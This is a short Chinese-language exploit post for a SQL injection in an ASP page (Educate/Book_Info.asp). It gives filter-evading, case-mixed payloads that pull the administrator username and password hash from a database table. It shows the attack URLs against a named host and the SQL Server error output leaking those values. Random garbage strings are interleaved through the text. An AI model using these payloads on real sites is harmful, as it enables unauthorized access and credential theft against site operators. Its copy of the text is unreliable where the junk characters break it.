漏洞出现在Educate/Book_Info.asp
: ~5 ^% W P. C' I此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
5 z% u3 z0 Q Kexp:如下8 C8 d# W# H5 @/ k' r, g) O
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
( J+ c1 g/ I# H/ v/ t查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)5 l, O1 F7 L, m2 e
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)- J& A1 X% A% @" z
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
I1 ?+ H) t, `. E! e将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
) u! m: }- N$ K9 c/Educate/Book_Info.asp,行 8
# |( i* U' I- v8 T/ X! ghttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
) D1 F' U6 R# l: D n. O& ]" t2 R5 kMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
* U2 {# `9 ~: _! o P. \# ~将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。% P, u. v+ s/ [% M: y
/Educate/Book_Info.asp,行 8 |